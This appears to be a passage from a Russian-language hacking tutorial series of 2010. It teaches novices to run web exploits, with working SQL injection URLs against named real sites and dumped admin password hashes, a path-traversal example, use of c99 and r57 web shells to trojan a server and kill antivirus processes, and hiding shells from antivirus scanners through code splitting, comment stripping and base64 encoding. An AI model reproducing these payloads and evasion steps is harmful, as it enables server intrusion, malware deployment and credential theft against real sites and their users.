if($a =~ /coucou/i) {#put the username of the user_id=[id]

syswrite(STDOUT,chr($ord));

$i++;

last;

}

}

}
----------------------------------------------------------------------------------------------------------------------------
3)Редактируем код под себя
4)Переименовываем любое_имя.txt в любое_имя.pl //Расширение pl это означает что это перловый файл)
5)Запускаем скрипт.....и у нас в терминале будет появляться (по одной букавке) хеш.....

----------------------------------------------------------------------------------------------------------------------------
Убедительная просьба....не используйте скрипт до конца....(я имею ввиду....запустите его....посмотрите как он работает (до 3х букв максимум) ибо когда идёт перебор....посылаются "некорректные" запросы...и они остаются в логах у админа....представьте ...если хотя-бы 100 человек попробует этот скрипт до конца....то админ....даже если он лаймер)))всёравно заметит...и закроет дыру.
------------------------------------------------------------------------------------------------------------------------------

В любом случае я вам просто показал как можно использовать эксплойты написанные на Perl.

\\\\\\\\\\\\\\\\\\\\\\\\\\\
Вы еще что то не поняли....тогда вот еще пример использования эксплойта.....

Рассмотрим следующий эксплойт написанный для joomla!
http://milw0rm.com/exploits/5729

Как вы видите этот эксплойт написан для Joomla которая поддерживает радио или видео.
Так же, если вы заметили , то тут как в первом случае примеров нету...Поэтому я нашёл сам...=)
Примеры использования эксплойта:
1) http://ural-fan.ru/index.php?option=com_joomradio&&page=show_radio&id=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users--
//admin:5983e4c69b1465f771d4c91d265219a5
2)http://www.parustv.com/index2.php?option=com_joomradio&page=show_radio&id=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users--
//4Rolny48:017849559a523a3f0923b91a5347d217
3)http://dwg-web.com/index2.php?option=com_joomradio&page=show_radio&id=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users--
//jackalll:7f3ff651c487439dd340fdcbc7978191

Вот еще один эксплойт для Joomla
http://milw0rm.com/exploits/5300
И как вы можете заметить ....опять для определённого компонента.... "com_cinema"
Вот примеры...
1)http://www.jac64.com/index.php?option=com_cinema&Itemid=1&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*
//admin:3d1c26bc6bf804e7ade03bed7438c1cc
2)http://www.horror.it/index.php?option=com_cinema&Itemid=75&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*
//admin:c67f6752a25481cb01b4cd662be3aa3d

Надеюсь теперь вам стало понятнее....
К сожалению не получилось внятно найти эксплойта на php iclude....(я имею ввиду пример...) а вот эксплойт есть.....
http://milw0rm.com/exploits/7658
Так как вы у меня уже грамотные =) я уверен, что вы разберётесь ...если увидите....что то подобное
Вот пример...
www.site.com/admin/admin_words.php?ModName=../../../../../etc/passwd

И вот хорошая статья про PHP include ....
http://www.netzoom.ru/view/533.html

И наконец я вам должен рассказать про то как можно php скрипты открывать через терминал)
Этот способ используют очень часто в мире эксплойтов....вот вам пример такого эксплойта...
http://milw0rm.com/exploits/7611

И так...что нам нужно....
1)Создаём --- Сохраняем экплойт (который приведён выше).Пример example.php
2)Открываем командную строку
3)Переходим в каталог(директорию), где расположен файл php.exe Так как у вас установлен сервер...для каждого путь индивидуален....у меня этот путь будет C:WebServersusrlocalphp5 там расположен мой файл php.exe
//Если вы точно не знаете где у вас он расположен прибегаем к поисковику...(Ваш стандартный поисковик файлов)
4)Далее перекидываем файл example.php
5)И прописываем в командной строке...
cd [путь к php.еxe] у меня это будет C:WebServersusrlocalphp5...
Пример: cd C:WebServersusrlocalphp5 (жмём энтр)

Следующая команда будет

php.exe example.php

Опять жмём энор и видим ...что этот эксплойт предлагает нам опции....
-u - идонтифекатор пользователя....(у администраторов он обычно под номером 1 )
-s (targen for exploting) -Таргет..это цель....или в нашем случае это сайт... то-есть уязвимый сайт...который мы хотим сломать этим эксплойтом....

Задаём опции
php.exe example.php -s=http:site.comchasti -u=1

После того как мы указали правильно параметры...начался брут хеша.....
-----------------------------------------------------------------------------------------------------------------------------------------

Итог

1)Мы узнали что такое Exploit и как его используют (для WEB)
2)Узнали почему Хакерам так не легко всё взламывать....и познакомились с понятием "Движок"
3)На практике рассмотрели разные виды эксплойтов под разные движки.
4)Узнали про еще один вид кодирования md5
5)Хоть и чуть чуть....но затронули тему php include (прочитайте ссылку которю я вам дал...)
6)Узнали какие виды эксплойтов бывают....и то что они пишутся под разными языками...(хочу еще добавить ...большинство Эксплойтов пишется под Perl и PHP, так что подумайте какие языки выбирать для обучения.)
7)Ну и наконец научились Запускать эксплойты из под терминала....(Perl & PHP)

сriрt>

04.01.2010 19:29

Shell

Shell code - (Шелл код)это код который может управлять(отдавать команды) удалённой машиной (компьютером) через командную строку.

Ох как много накрученных слов....но это на первый взгляд....на самом деле всё гораздо проще.....как только вы увидите что это такое.....

Я достал свой маленький архив Шеллов.... для того , чтобы вы посмотрели на практике что это такое....
Скачать можно тут : http://narod.ru/disk/4715943000/shells%20(copy%203).rar.html

В этом архиве находится 5 разных шеллов , но функции у них почти одни и те же....просто кому какой удобнее)))
Функционал у всех шеллов тоже особо не отличается....но в некоторых больше функций в некоторых меньше....

Перейдём к практике.
Если вы читали мои предыдущие уроки , то у вас уже должен быть установлен ваш локальный сервер....тоесть "localhost", он нам понадобится для того чтобы экспериментировать....

1) Разархивируйте архив с шеллами и у вас появится папка "shells" перенесите папку на ваш локальный сервер...
чтобы путь к папке shells был такой.... localhost/shells
(Вообще это не обязательно...но мы это делаем для того чтобы в дальнейшем вы не растерялись)

2)Теперь давайте откроем Браузер и введём туда localhost/shells/c99madshell.php
И перед вами появится шелл! теперь давайте рассмотрим его по подробнее

Вот так выглядит "Головная" часть шелла....которая показывает всю информацию о Сервере(где расположен шелл).

------------------------------------------------------------------------------------------------------------------------------------
Software: Apache/2.0.59 (Win32) [link=http://localhost/shells/c99madshell.php#]http://localhost/shells/c99madshell.php#[/link]PHP/5.1.6 //Версия Apache и PHP
uname -a: Windows NT XAKEP9009 5.1 build 2600 // Имя компьютера и Операционная система.
Хакер9009 //Имя пользователя
Safe-mode: OFF (not secure) //Это настройки сервера (включён ли безопасный режим или нет)
T:homelocalhostshells drwxrwxrwx // Дерриктория где расположен шелл ( полный путь)
Free 22.56 GB of 93.16 GB (24.22%) //Свободное место на Сервере(на кмпе жосткий диск)
Detected drives: [ a ] [ c ][ d ][ e ][ t ] //Локальные(жосткие диски) и не локальные(флешки) диски.
Как вы заметили если на них нажать , то вы можете передвигаться по этим деррикториямдискам.... скажем диска "C:"
-----------------------------------------------------------------------------------------------------------------------------------

Как видите ничего сложного....поехали дальше...(а если сложности возникли...то просто попробуйте на практике и я уверен вы всё поймёте!)

3) Listing folder (7 files and 1 folders): //Какие файлы и папки расположены в текущей директории.....
//(почему в текущей? потому как вы можете передвигаться по директориям)

Ниже идут столбцы:
Name - Имя файла или папки. ( Запомните ".." двоеточие означает переход на каталог выше.
Пример: Были "C:Programm files" Пишем: "С:Programm files.." оказываемся "С:" .А одна точка означает текущий каталог.
Size - Размер или тип(папка - DIR или ссылка - LINK).
Modify - Когда последний раз модифицировали этот файл или папку. (или создали этот файл папку ).
Perms - Права на запись(w) или чтение(r). Bсё вместе(и запись и чтение будет rw).
Action - Действия и здесь есть три пункта
I - information (информация о файлах и папках)
E - Edit ( редактировать файлы и папки)
D - Download (Скачивание файлов)

Чуть ниже расположено поле
Select All - выделить всё (для того чтобы проделать какие то действия)
UnSelect All - снять выделении.
With Selected - это поле означает какие действия будем проделывать с файлами которые выделены....Там есть несколько вариантов....
Delete - удалить
Сut - вырезать
Copy - копировать
Change-mode - изменить права на запись и чтение.

Так же если вы будете копировать - вырезать....у вас появится кнопка Paset - вставить....(переходите в любую директорию ...жмёте Paste и тот файл который вы копироваливырезали...вставиться именно в ту директорию....

4) Сommand Execute
Выполнение команд....

Эта часть Шелла работает полностью с командной строкой....
И тут то мы вспоминаем всемирный вопрос....зачем нам знать Unix для взлома серверов?

А вот зачем....
Попробуйте набрать в поле Enter:

ls

Что вы увидите в поле...
Result of execution this command: // Результат от выполненной команды...

А вот именно! ничего....

А попробуйте набрать вот эту команду:

DIR

Вы увидите что то вроде этого

----------------------------------------------------------------------------------------------------------------------------------------
Содержимое папки T:homelocalhostshells

31.12.2008 14:47

31.12.2008 14:47

24.12.2008 21:47 44 283 c99madshell.php
31.12.2008 14:48

clon

25.03.2004 00:55 4 884 KA_uShell.php
04.03.2004 17:05 15 431 r57shell.php
23.10.2003 03:22 91 159 remview.php
18.10.2003 21:15 15 965 result.php
10.12.2003 21:49 208 538 shell.php
31.08.2008 20:55 12 461 wxshell.php
7 файлов 392 721 байт
3 папок 24 223 674 368 байт свободно
------------------------------------------------------------------------------------------------------------------------------------

А это две одинаковые команды...только одна исполняется в Unix системах .... а другая в Windows....

Теперь представьте у вас есть доступ к командной строке где стоит Fedora 9 .... а вы не знаете ни одной команды....вот досада то....=) соответственно ничего вы сделать с этим "даром" не сможете....

Поэтому не пренебрегайте и самое главное не бойтесь командной строки...она вам не раз поможет!

Поехали дальше....

Поле Make DIR означает создание папки Пример: T:homelocalhostshellslol //Создастся папка с именем "lol"
Make file означает создание фала. T:homelocalhostshellshelp.php //Создастся файл (php)
Search искать файл. // Честно говоря плохо работает =-)
Upload загрузить файл на сервер. (в текущую директорию)
GoDIR Прописываем директорию в которую мы хотим пройти....
Go File (ОткрытьСкачать файл)
Select Показывает открытые порты у сервака....

//Так же посмотрите SQL и Tools Первое для подключения к Базе данных на сервере...а второе это открытие портов....

Основной функционал мы рассмотрели.....

Теперь давайте рассмотрим для чего нам этот шелл нужен.....

Ситуация...мы получили доступ к админке на любом форумесайте...неважно....главное , что мы можем залить Shell
Залили его...и теперь (в зависимости от расставленных прав) мы получаем полноценный доступ к серверу!

Почему я выделил слово Сервер....потому , что на сервере как правило расположен не один сайт.....
А значит...сломав один сайт мы получаем доступ ко всем сайтам расположенных на этом сервере....
Посмотреть Какие сайты расположены на сервере можно тут http://madnet.name/tools/madss/

Теперь имея шелл мы можем пройтись по директориям и отредактировать index (главная страница)
Так же мы можем протроянить этот сервак убив несколько процессов(допустим антивирусы)
Первым делом узнаём процессы(выполняемые на серваке) tasklist почему то у меня в c99madshell.php не сработал....просто вылетел)))
но зато сработал в r57shell.php
(еще одна разновидность шелла хочу заметить...этот шелл старичок и его вы должны знать как никакой другой...хотя бы ради приличия, так что ознакомьтесь с ним...)

После чего зная PID (номер процесса) мы можем завершить его ...набрав команду
taskkill /PID 4444 /T где 4444 это номер процесса который мы хотим завершить.... "/T" мы пишем для того...чтобы завершить ВСЕ дочерние процессы связанные с этим.

Следующий этап будет залитие трояна на сервер и запуск..делается это очень легко....
В Upload выбираем программу (троян) который мы хотим запустить.....
Качаем её на сервер....

После чего выполняем такую команду....
Start troian.exe где troian.exe это залитый вами троян....

---------------------------------------------------------------------------------------------------------------------------------------

Вот и всё сервер мы протроянили....

Еще один из моих любимых Shell кодов является remview.php

Легче этого шелаа я вообще не видел....
Если вы нажмёте на картинку "Молоточек с папкой" , а по другому и не скажешь....
То вы зайдёте в ту часть...где можно отдавать команды....

Shell commands Аналог Сommand Execute // это там где отдаются команды командной строке.

Не пугайтесь увидев это :
#example (remove comments '#'):

#cat /etc/passwd;

#ps -ax

#uname -a

Это просто приведены примеры....

Так же тут есть функция кодирования в разные кодировки....
Universal convert

Вообщем все остальные шеллы очень похожи....если не внешне ....то названиями полей и теперь вы сможете самостоятельно определить к чему какое поле относится...
------------------------------------------------------------------------------------------------------------------------------------------

Но как вы заметили (если у вас стоят антивирусы) то вы даже не сможете залить shell... так как он распознаётся как троян....
и сразу блокируется.....

поэтому давайте поговорим о криптографии...

Сам себе криптор.

Я хочу рассказать вам о основах криптографии....

Опять же...ничего сложного здесь нет...мне казалось криптуют только самые крутые хакеры....познав Perl я понял , что это не так =)
Криптовать может каждый....и я вам это докажу...правда сделаю огаворку...разговор будет весить больше про WEB , чем про программы.

Для того , чтобы понять как криптовать...нам нужно понять как работают антивирусы.
Антивирусы работают по принципу сравнения сигнатур.
Пример: В базе данных антивируса хранится код который является вредоносной программой.(по его мнению)
допустим это будет php код....

echo("I am troi!");
?>

Тогда нам надо обмануть антивирус....и заменить этот код на его синоним...

print("I am troi!");
?>

Это один из способов....(замена на синоним)
Но....для того , чтобы заменять на синоним....нам нужно определить какой именно кусок кода является вирусомтрояном
(по мнению антивируса)

И я это делаю так....

Берём
r57shell.php и разбиваем на несколько кусочков....а именно...

от .
Тоесть разбиваем на части....
Пример:У нас есть файл с содержимым
---------------------------------------------------------------------------------------------------------------------------------------------
echo("this is troi");
?>

LOL

$i = 10;
echo("$i");
?>
----------------------------------------------------------------------------------------------------------------------------------------------

Разбиваем его на несколько кусков....
1)
echo("this is troi");
?>
2)

LOL

оdу>
3)
$i = 10;
echo("$i");
?>

После чего сканируем на наличие вирусов каждый из них.....находим вредоносную часть...и заменяем её на синоним....
Или если эта часть кода вам вообще не нужна ....вы можете её удалить....

Что кстати подходит к нашему случаю....с r57shell.php
Оказалось...что антивирус(по крайней мере мой) реагирует на код который распложен между
я полазил по интернету....что означает этот Джава скрипт код....и узнал что это просто напросто счётчик....=-)
Который нам совсем не нужен)))
Удаляем его....и еще раз проверяем на наличие вирусов...и более это не вредоносная программаскрипт =-)

Поздравляю! это ваш первый опыт в криптографии (я уверен не последний).

Бывают случаи когда антивирусы ищут не только по Коду....но и по комментариям!
Поэтому Удаляйте все лишние комментарии....(Но из уважения к автору ,который написал скрипт...оставляйте его Ник.)

Так мы и поступим с нашим следующим shell`ом remview.php
Удаляем все комментарии-описания...и получаем еще один не "палящийся" шелл код.

Так же бывают случаи ,когда синонима просто нет!
В этом случае к нам приходит на помощь base64
Это гениальная вещь для того , чтобы закриптовать нужный нам код...

Допустим у нас есть..
------------------------------------------------------------------------------------------------------------------------------------------------
$x=10;
$y=12;
$z=$x+$y;
echo("$x+$y=$z");
?>
------------------------------------------------------------------------------------------------------------------------------------------------
нам нужно сделать так, чтобы антивирус и писку не издал)))

тогда делаем так....
-------------------------------------------------------------------------------------------------------------------------------------------------
$cod="JHg9MTA7DQokeT0xMjsNCiR6PSR4KyR5Ow0KZWNobygiJHgrJHk9JHoiKTsNCg==";
echo base64_encode($cod);
?>
-------------------------------------------------------------------------------------------------------------------------------------------------

То что я выделил тёмно синим это тот же код....только закодированный в base64
А сделать это можно тут http://www.motobit.com/util/base64-decoder-encoder.asp

Как вы видите...я взял закодированный код в переменную ....и при помощи функции base64_encode декодировал....и вывел её...

Таким образом результат не меняется....а антивирус молчит =-)
Так что вы можете экспериментировать на всём.....

Еще пару способов запутать антивирус....это поменять имена переменным....по вставлять хлама....
Прмер: $a=1; $b=3; $a+$b=$z; //хотя мы этого нигде не используем...

Ну и на последок хочу сказать о компилируемых языках....для вас всё выше описанное подходит.....единственное вам прийдётся туго с base64 там надо скачать и подключить специальную библиотеку которую можно найти тут
http://libb64.sourceforge.net/

А и вот еще что....по экспериментируйте с компиляторами...
Иногда компилятор сам работает как криптор =).

Итог

1)Мы с вами узнали что такое Shell код ...и для чего он нужен на практике рассмотрели его в действии.
2)Наконец поняли почему нам надо учить Unix и не просто поставить и любоваться им....а изучать файловую систему и базовые команды.
3)Теперь если нам покажут Shell мы не будем робеть....и скажем....мне этот шелл не нравиться давай лучше поставим....(название шелла)
4)Узнали как устроены антивирусы...и поняли на сколько они не безупречны....шаг в лева шаг в право....и вирус превращается в дружественную программу
5)Познали основы криптографии.... и я уверен , что мои ученики смогут развить все приведённые способы...
6)Узнали про такой вид кодировки как base64 //Более подробно можете прочитать тут http://ru.wikipedia.org/wiki/Base64
7)И самое главное теперь вы будете более уверенно себя чувствовать в Хакерской терминологии.

оdу>

03.01.2010 18:47

HTTP

ПАРУ ФИШЕК . . .

HTTP это HyperText Transfer Protocol — протокол передачи гипертекста.
Более подробно смотрите тут http://ru.wikipedia.org/wiki/HTTP

Sniffer - от английского слова нюхать. - Сетевой анализ трафика (не пугайтесь , звучит угрожающе...на самом деле ерунда , на примере всё поймёте.)
Более подробно смотрите тут http://ru.wikipedia.org/wiki/Sniffer

Для того чтобы просматривать весь проходящий трафик...нам нужно будет скачать такую программу как EffeTechHTTPSniffer

Она понадобится для того ,чтобы на более низком уровне просматривать весть проходящий трафик по HTTP протоколу....
Эту программу вы можете найти тут.
http://narod.ru/disk/3930462000/EffeTechHTTPSniffer.rar.html

После того как вы её установили....мы перейдём к фишкам....которых я 4 недели назад искал и ничего об этом не нашёл....

Обманываем обманщиков.

Под обманщиками я понимаю такие сайты как vkontakte.ru и weborama.ru
Почему они обманщики?....а потому что выкладывать музыку можно....а скачать нельзя....что за бред?

Ну так давайте обманим тех кто обманывает нас....и научимся скачивать музыку с любого сайта....(где она есть естественно =) )

Качаем музыку с Vkontakte.ru

//Хочу сразу сказать...что все эти манипуляции я проделывал в Firefox ....с установленным Flash плеером...поэтому если у тебя не установлен //флеш плеер...установи...
ВАЖНО не жмите проигрывание песни до Сниффера
1)Находим нужную нам песню....(в контакте)
2)Не нажимая на проигрывание песни переходим к нашему Снифферу...
3)Жмём Start и наш сниффер начинает работу.
4)Нажимаем на проигрывание песни....ждём пока вы не увидите ,что сниффер перестал ловить пакеты от контакта.
5)Выключаем сниффер (Stop Sniffer)
6)И теперь нам надо из полученных пакетов определить где же наша песня...

А сделать это легко....я просил вас в самом начале не жать проигрывание этой песни...до запуска сниффера...ибо нам важен момент подключения к этой песне....(перехват момента подключения) и этот момент и будет содержать в себе прямую ссылку на этот файл!

Тоесть если вы всё правильно сделали....то у вас в логе сниффера должна была появится примерно такая строчка....
http://cs1334.vkontakte.ru/u5970851/audio/f222da89b197.mp3

Это и будет прямая ссылка на файл)))

Тоесть в вашем сниффере должна появиться строка с такими значениями
Server(IP:Port) = http://cs1334.vkontakte.ru
URL = /u5970851/audio/f222da89b197.mp3
Это и есть прямая ссылка....на файл....только в разбитом виде....(чтобы получить её полностью вы можете нажать в сниффере на это поле два раза потом перейти во вкладку Content и вот она ваша ссылка полностью)!

7)После того как вы получили ссыку такого вида....
[link=http://cs1334.vkontakte.ru/u5970851/audio/f222da89b197.mp3%C2%A0]http://cs1334.vkontakte.ru/u5970851/audio/f222da89b197.mp3 [/link] переходим по ней....далее
Файл --- Сохранить как --- Тип (все файлы) имя (на своё усмотрение).mp3---сохранить.

-------------------------------------------------------------------------------------------------------------------------------------------
для закрепления...

Качаем видео с Vkontakte.ru

Надеюсь вы поняли ,что на одной музыке мы не остановимся!!!и никаких сервисов для скачивания видео с контакта нам не нужно мы Хакеры мы свободные люди!(пока ^^)
Так вот...поехали...
1)Открываем страничку с видео....(НО НЕ ПРОСМАТРИВАЕМ)
2)Включаем Наш сниффер!
3)Ждём пакетов от контакта....
4)Получаем пакет с подключением....вот такого типа...
http://195.218.181.192/assets/videos/8c5eb68373952271.vk.flv
и он же является прямой ссылкой на скачку этого файла....
5)Качаем.//Надеюсь объяснять про flv файлы ненадо....=)

----------------------------------------------------------------------------------------------------------------------------------

Теперь что же делать если вы всётаки нажали на просмотрпрослушку раньше чем вы включили наш сниффер!
Вам надо удалить все личные данные....(которые браузер сохраняет автоматически.)Делается это в Свойствах или Настройках//в разных браузерах по разному

Теперь проделаем тоже самое с weborama.ru

1)Выбираем песню которую хотим прслушать(но не прослушиваем)
2)Запускаем Сниффер
3)Ждём буквально секунд 10
4)и на Вебораме сделали....поумнее....они спрятали .mp3 в ссылку такого вида
http://static1.weborama.ru/audio/f2/f2b5e251369c5ee01931522edc7693e5

Как увидили....
Server: http://static1.weborama.ru URL: /audio/f2/f2b5e251369c5ee01931522edc7693e5
Без сомнений копируйте ссылку....и вставляйте в браузер....
После чего подождите пока он обработает запрос....и выдаст вам файл....который вы сможете сохранить как mp3

---------------------------------------------------------------------------------------------------------------------------------

Это я вам привёл всего несколько возможностей HTTP Sniff`ера....

А те кто удосужились выучить html могут гораздо больше!)

Так же HTTP сниффер используют для нахождения уязвимостей таких как SQL уязвимостей так....и всех о которых я уже писал....так как в адресной строке передаются параметры...которые обычно спрятанны...а при детальном анализе мы сможем применить эту информацию для взлома....
Так же Сниффер можно использовать против пинча....(запустить сниффер , а затем пинч тем самым перехватить Логин и пароль от почты, от сайта.....короче куда отчёты он шлёт)

Так что возьмите себе на заметку такую мощную вещь!

---------------------------------------------------------------------------------------------------------------------------------
Вывод
1)Узнали что такое HTTP sniffer
2)Мы узнали ,что мы не все процессы видим...которые выполняет наш браузер!
3)Поняли ,что он нам очень поможет в нахождении и реализации уязвимостей.
4)Научились обманывать обманщиков....